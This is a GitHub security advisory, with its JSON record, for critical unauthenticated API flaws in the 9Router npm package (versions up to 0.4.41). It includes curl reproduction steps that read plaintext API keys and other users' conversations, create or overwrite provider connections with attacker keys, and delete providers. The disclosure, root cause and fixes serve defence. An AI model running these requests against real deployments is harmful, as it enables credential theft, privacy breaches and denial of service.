GHSA-VJC7-JRH9-9J86
Vulnerability from github – Published: 2026-07-06 21:22 – Updated: 2026-07-06 21:22title: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats product: 9Router version: <= 0.4.41 severity: critical cve_request: true
Summary
Multiple critical API security vulnerabilities were discovered in 9Router's Next.js dashboard. The /api/providers endpoints lack authentication entirely, allowing anyone to create, read, update, and delete provider connections. Additionally, /api/usage/stats exposes full plaintext API keys, and /api/usage/request-logs + /api/usage/request-details expose all users' request history and full conversation contents (including system prompts, user messages, assistant responses) without authentication.
Affected Endpoints
| Endpoint | Method | Issue |
|---|---|---|
/api/providers |
GET | Lists all provider connections with partial credentials, OAuth tokens, account IDs |
/api/providers/:id |
GET | Read any single provider detail (IDOR) |
/api/providers |
POST | Create arbitrary provider connections with attacker-controlled API keys |
/api/providers/:id |
PUT | Modify any existing provider connection |
/api/providers/:id |
DELETE | Delete any provider connection |
/api/usage/stats |
GET | Exposes full plaintext API keys, per-account usage breakdown, cost data |
/api/usage/request-logs |
GET | Exposes all users' request logs (model, tokens, cost, timestamp, provider) |
/api/usage/request-details/:id |
GET | Exposes full conversation turns including system prompts, user messages, assistant responses |
/api/version |
GET | Exposes current version info |
/api/models |
GET | Exposes full model routing catalog |
/api/v1/models |
GET | Exposes model list |
Impact
Critical: Provider CRUD without authentication
An attacker can: 1. Add a malicious provider — inject a provider that proxies through their server, capturing all prompts, responses, and API keys routed through 9Router 2. Modify existing providers — replace API keys with attacker-controlled ones, redirect traffic 3. Delete all providers — cause complete denial of service 4. Read all provider configurations — harvest partial credentials, GitHub Copilot OAuth tokens, Cloudflare account IDs, email addresses
Critical: Full API key leak via /api/usage/stats
The endpoint returns complete API key strings (e.g., sk-...) in plaintext alongside usage data per key, enabling unauthorized use of connected AI provider accounts.
Critical: Conversation history leak
/api/usage/request-details returns the full conversation history of other users' AI sessions, including system prompts, user messages, assistant responses, tool calls, and reasoning traces.
Steps to Reproduce
1. Unauthenticated read of all providers
curl -s https://<host>/api/providers
Returns all provider connections with email addresses, auth type, account IDs, and partial API key prefixes.
2. Create a provider without authentication
curl -X POST https://<host>/api/providers \
-H "Content-Type: application/json" \
-d '{"provider":"openai","authType":"apikey","name":"rogue","apiKey":"sk-attacker-controlled"}'
Returns the created connection object with a new UUID and isActive: true.
3. Modify an existing provider without authentication
curl -X PUT https://<host>/api/providers/<existing-uuid> \
-H "Content-Type: application/json" \
-d '{"name":"modified","apiKey":"sk-attacker-key"}'
Returns the updated connection object.
4. Delete a provider without authentication
curl -X DELETE https://<host>/api/providers/<existing-uuid>
Returns {"message":"Connection deleted successfully"}.
5. Read full usage stats with API keys
curl -s https://<host>/api/usage/stats
Returns full API key strings, per-account token/cost breakdown, recent requests.
6. Read request logs
curl -s "https://<host>/api/usage/request-logs?page=1&pageSize=50"
Returns paginated request logs with timestamps, models, providers, user emails, token counts.
7. Read full conversation
curl -s https://<host>/api/usage/request-details/<request-uuid>
Returns complete conversation turns for that request.
8. Read version info
curl -s https://<host>/api/version
Returns {"currentVersion":"0.4.19","latestVersion":"0.4.45","hasUpdate":true}.
Root Cause
The Next.js API routes under src/app/api/* lack authentication middleware on several endpoints. Specifically:
/api/providers/*— No auth check before CRUD operations on provider connections stored in the database/api/usage/stats— No auth check before returning aggregated usage data including full API keys/api/usage/request-logs— No auth check before returning request history/api/usage/request-details/:id— No auth check before returning full conversation contents
Suggested Fix
- Add authentication middleware to all
/api/providers/*routes (GET, POST, PUT, DELETE) - Add authentication middleware to all
/api/usage/*routes - Never return full API key strings in any API response — return masked keys only
- Never return GitHub Copilot tokens or similar OAuth secrets in API responses
- Implement proper authorization checks so users can only access their own data
- Add rate limiting to public endpoints
Resources
- https://github.com/decolua/9router
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "9router"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.4.41"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-306",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-06T21:22:10Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "---\ntitle: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats\nproduct: 9Router\nversion: \u003c= 0.4.41\nseverity: critical\ncve_request: true\n---\n\n## Summary\n\nMultiple critical API security vulnerabilities were discovered in 9Router\u0027s Next.js dashboard. The `/api/providers` endpoints lack authentication entirely, allowing anyone to create, read, update, and delete provider connections. Additionally, `/api/usage/stats` exposes full plaintext API keys, and `/api/usage/request-logs` + `/api/usage/request-details` expose all users\u0027 request history and full conversation contents (including system prompts, user messages, assistant responses) without authentication.\n\n## Affected Endpoints\n\n| Endpoint | Method | Issue |\n|---|---|---|\n| `/api/providers` | GET | Lists all provider connections with partial credentials, OAuth tokens, account IDs |\n| `/api/providers/:id` | GET | Read any single provider detail (IDOR) |\n| `/api/providers` | POST | Create arbitrary provider connections with attacker-controlled API keys |\n| `/api/providers/:id` | PUT | Modify any existing provider connection |\n| `/api/providers/:id` | DELETE | Delete any provider connection |\n| `/api/usage/stats` | GET | Exposes full plaintext API keys, per-account usage breakdown, cost data |\n| `/api/usage/request-logs` | GET | Exposes all users\u0027 request logs (model, tokens, cost, timestamp, provider) |\n| `/api/usage/request-details/:id` | GET | Exposes full conversation turns including system prompts, user messages, assistant responses |\n| `/api/version` | GET | Exposes current version info |\n| `/api/models` | GET | Exposes full model routing catalog |\n| `/api/v1/models` | GET | Exposes model list |\n\n## Impact\n\n### Critical: Provider CRUD without authentication\n\nAn attacker can:\n1. **Add a malicious provider** \u2014 inject a provider that proxies through their server, capturing all prompts, responses, and API keys routed through 9Router\n2. **Modify existing providers** \u2014 replace API keys with attacker-controlled ones, redirect traffic\n3. **Delete all providers** \u2014 cause complete denial of service\n4. **Read all provider configurations** \u2014 harvest partial credentials, GitHub Copilot OAuth tokens, Cloudflare account IDs, email addresses\n\n### Critical: Full API key leak via /api/usage/stats\n\nThe endpoint returns complete API key strings (e.g., `sk-...`) in plaintext alongside usage data per key, enabling unauthorized use of connected AI provider accounts.\n\n### Critical: Conversation history leak\n\n`/api/usage/request-details` returns the full conversation history of other users\u0027 AI sessions, including system prompts, user messages, assistant responses, tool calls, and reasoning traces.\n\n## Steps to Reproduce\n\n### 1. Unauthenticated read of all providers\n\n```bash\ncurl -s https://\u003chost\u003e/api/providers\n```\n\nReturns all provider connections with email addresses, auth type, account IDs, and partial API key prefixes.\n\n### 2. Create a provider without authentication\n\n```bash\ncurl -X POST https://\u003chost\u003e/api/providers \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"provider\":\"openai\",\"authType\":\"apikey\",\"name\":\"rogue\",\"apiKey\":\"sk-attacker-controlled\"}\u0027\n```\n\nReturns the created connection object with a new UUID and `isActive: true`.\n\n### 3. Modify an existing provider without authentication\n\n```bash\ncurl -X PUT https://\u003chost\u003e/api/providers/\u003cexisting-uuid\u003e \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"name\":\"modified\",\"apiKey\":\"sk-attacker-key\"}\u0027\n```\n\nReturns the updated connection object.\n\n### 4. Delete a provider without authentication\n\n```bash\ncurl -X DELETE https://\u003chost\u003e/api/providers/\u003cexisting-uuid\u003e\n```\n\nReturns `{\"message\":\"Connection deleted successfully\"}`.\n\n### 5. Read full usage stats with API keys\n\n```bash\ncurl -s https://\u003chost\u003e/api/usage/stats\n```\n\nReturns full API key strings, per-account token/cost breakdown, recent requests.\n\n### 6. Read request logs\n\n```bash\ncurl -s \"https://\u003chost\u003e/api/usage/request-logs?page=1\u0026pageSize=50\"\n```\n\nReturns paginated request logs with timestamps, models, providers, user emails, token counts.\n\n### 7. Read full conversation\n\n```bash\ncurl -s https://\u003chost\u003e/api/usage/request-details/\u003crequest-uuid\u003e\n```\n\nReturns complete conversation turns for that request.\n\n### 8. Read version info\n\n```bash\ncurl -s https://\u003chost\u003e/api/version\n```\n\nReturns `{\"currentVersion\":\"0.4.19\",\"latestVersion\":\"0.4.45\",\"hasUpdate\":true}`.\n\n## Root Cause\n\nThe Next.js API routes under `src/app/api/*` lack authentication middleware on several endpoints. Specifically:\n\n- `/api/providers/*` \u2014 No auth check before CRUD operations on provider connections stored in the database\n- `/api/usage/stats` \u2014 No auth check before returning aggregated usage data including full API keys\n- `/api/usage/request-logs` \u2014 No auth check before returning request history\n- `/api/usage/request-details/:id` \u2014 No auth check before returning full conversation contents\n\n## Suggested Fix\n\n1. Add authentication middleware to all `/api/providers/*` routes (GET, POST, PUT, DELETE)\n2. Add authentication middleware to all `/api/usage/*` routes\n3. Never return full API key strings in any API response \u2014 return masked keys only\n4. Never return GitHub Copilot tokens or similar OAuth secrets in API responses\n5. Implement proper authorization checks so users can only access their own data\n6. Add rate limiting to public endpoints\n\n## Resources\n\n- https://github.com/decolua/9router",
"id": "GHSA-vjc7-jrh9-9j86",
"modified": "2026-07-06T21:22:10Z",
"published": "2026-07-06T21:22:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/decolua/9router/security/advisories/GHSA-vjc7-jrh9-9j86"
},
{
"type": "PACKAGE",
"url": "https://github.com/decolua/9router"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "9router has unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.